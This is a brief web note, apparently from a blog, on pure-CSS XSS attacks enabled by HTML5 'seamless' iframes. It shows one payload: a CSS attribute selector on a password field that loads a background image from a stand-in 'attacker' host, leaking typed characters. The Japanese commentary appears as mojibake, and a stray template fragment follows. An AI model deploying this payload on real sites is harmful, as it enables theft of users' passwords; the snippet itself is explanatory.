pure css-based XSS attacks ?<style>input[name=password][value*=a]{ background:url('//attacker?log[]=a'); }</style> <iframe seamless src=âlogin.aspâ/> HTML5 includes "seamless" iframes could allow for pure css-based XSS attacks ãã®ãããªãã¯ã¿ããããè¿ãå°æ¥ã«ããã¦å®ç¾ãããªãã°æ¥µãã¦å£åã§ããã¾ãXSSãæç«ãããªãformã®ä¸ã®inputè¦ç´ ã®ä¸èº«ãæ¼æ´©ããã®ã¯å½ç¶ã¨ãã¦ãJavaScriptç¡ãã§ãç¸è£ãã¦ãã¾ãããããå«ãªã¨ãããªã®ã§ãããã


{{#tags}}- {{label}}
{{/tags}}